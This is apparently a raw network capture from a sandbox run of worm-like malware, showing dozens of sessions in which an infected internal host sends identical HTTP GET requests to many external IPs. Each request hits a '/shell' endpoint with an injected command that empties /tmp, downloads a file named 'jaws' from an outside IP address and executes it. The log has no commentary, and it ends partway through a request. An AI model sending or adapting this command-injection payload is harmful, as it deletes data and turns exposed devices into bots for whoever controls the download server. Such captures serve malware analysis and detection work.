                    Jun 1, 2024 18:15:55.267405987 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:55.512356043 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:55.960427999 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:56.824139118 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:58.551898003 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    523192.168.2.2356660208.88.36.6080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267431974 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    524192.168.2.2351868134.253.46.580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267467022 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    525192.168.2.234255432.79.28.24480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267488956 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    526192.168.2.235230882.183.211.2280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267519951 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:55.512352943 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:55.960437059 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:56.824136972 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive
                    Jun 1, 2024 18:15:58.551892042 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    527192.168.2.233513280.169.53.16080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267550945 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    528192.168.2.2349982179.119.22.12080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267599106 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    529192.168.2.2348436119.233.198.22080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267641068 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    530192.168.2.2359680117.50.6.5980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267679930 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    531192.168.2.2335598203.183.146.12480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267704964 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    532192.168.2.2360162157.59.40.25280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267730951 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    533192.168.2.235338697.94.234.17680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267759085 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    534192.168.2.2348642211.236.21.2580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267784119 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    535192.168.2.2355206159.155.85.24680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267822027 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    536192.168.2.2348376156.11.139.20480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267862082 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    537192.168.2.2356332116.245.119.9380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267894030 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    538192.168.2.2355788112.160.11.20880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267923117 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    539192.168.2.236087450.45.43.16780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267968893 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    540192.168.2.234909659.33.69.19180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.267997980 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    541192.168.2.234955019.122.215.22380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268034935 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    542192.168.2.2345848148.228.134.2680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268095970 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    543192.168.2.234612059.74.146.9780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268136024 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    544192.168.2.2337028179.146.88.21980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268162966 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    545192.168.2.2340682120.172.16.12480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268202066 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    546192.168.2.2350984191.125.210.10580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268249035 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    547192.168.2.235316452.152.172.23780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268271923 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    548192.168.2.233970441.182.33.5880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268307924 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    549192.168.2.233810857.95.108.13680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268346071 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    550192.168.2.233742688.57.152.13480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268368006 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    551192.168.2.2350962181.111.33.480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268402100 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    552192.168.2.2342592134.20.23.8680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268431902 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    553192.168.2.2339326119.120.56.23880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268455029 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    554192.168.2.234422417.7.166.2580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268492937 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    555192.168.2.2336644208.229.32.2780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.268527985 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    556192.168.2.2333304117.221.193.16080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.272090912 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    557192.168.2.234579485.180.164.3180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.272495031 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    558192.168.2.235519077.114.121.880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.272558928 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    559192.168.2.2334184169.128.130.4080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.272624969 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    560192.168.2.23604382.243.242.4480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.272711039 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    561192.168.2.233876267.103.151.7880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:55.272742987 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    562192.168.2.2347646120.22.130.1480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.224350929 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    563192.168.2.235718617.87.254.2180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.224421978 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    564192.168.2.235884281.92.36.14880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.224464893 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    565192.168.2.2353508177.237.184.16280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244111061 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    566192.168.2.235647636.17.37.5280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244182110 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    567192.168.2.233883619.188.175.9680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244374037 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    568192.168.2.2346316117.23.22.2380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244457960 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    569192.168.2.235633445.33.63.8280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244558096 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    570192.168.2.2353316188.170.231.16080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244627953 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    571192.168.2.2352258185.108.7.25080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244662046 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    572192.168.2.234708085.214.28.2080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244800091 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    573192.168.2.235496890.145.31.13780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244829893 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    574192.168.2.234476827.59.60.10780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244879007 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    575192.168.2.233737257.33.20.18080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.244905949 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    576192.168.2.2345024201.6.73.20780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245224953 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    577192.168.2.2352570204.99.201.10780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245249033 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    578192.168.2.2350556159.201.245.1380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245292902 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
